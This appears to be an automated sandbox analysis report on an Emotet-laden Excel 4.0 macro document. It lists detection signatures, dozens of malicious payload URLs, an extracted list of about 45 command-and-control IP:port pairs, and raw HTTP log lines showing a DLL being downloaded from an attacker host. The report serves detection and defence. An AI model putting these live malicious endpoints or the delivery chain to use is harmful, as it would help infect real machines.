Windows Analysis Report
2022-28-01_1202.xls

Overview

General Information

Sample Name: 2022-28-01_1202.xls
Analysis ID: 562524
MD5: e31371453defbbf8840b40b5bff8600a
SHA1: bf7b00bc9192d147adc9d2fa52c69fe796e55d67
SHA256: 7649a43612652c0b32353e7ae9898150f885a770db0d024d0d034c4171d5d684
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://maxtdeveloper.com/okw9yx/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html4 Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3 Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.pngPE3 Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/ Avira URL Cloud: Label: malware
Source: http://hostfeeling.com Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com Avira URL Cloud: Label: malware
Source: http://it-o.biz/ Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3 Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlv Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlngs Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlmshta Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3 Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/ Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9 Avira URL Cloud: Label: malware
Source: http://91.240.118.172 Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlfunction Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/ Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlY Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.p Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlB Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlK Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Found malware configuration
Source: 15.2.rundll32.exe.220000.1.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Multi AV Scanner detection for submitted file
Source: 2022-28-01_1202.xls ReversingLabs: Detection: 11%
Multi AV Scanner detection for domain / URL
Source: hostfeeling.com Virustotal: Detection: 10% Perma Link
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Virustotal: Detection: 12% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: >ystem.pdbT source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A7E00 FindFirstFileW, 17_2_002A7E00

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: hostfeeling.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 23:14:50 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f478ea13105=1643411690; expires=Fri, 28-Jan-2022 23:15:50 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 23:14:50 GMTExpires: Fri, 28 Jan 2022 23:14:50 GMTContent-Disposition: attachment; filename="S2TSbn.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
Source: Joe Sandbox View ASN Name: ARUBA-ASNIT ARUBA-ASNIT
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Source: Joe Sandbox View IP Address: 212.237.17.99 212.237.17.99
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000003.411734628.000000000025F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html4
Source: 2022-28-01_1202.xls.0.dr String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlK
Source: mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlY
Source: mshta.exe, 00000004.00000003.413147395.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.413134769.0000000002A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlv
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675917527.000000001B87B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.666941334.0000000000350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
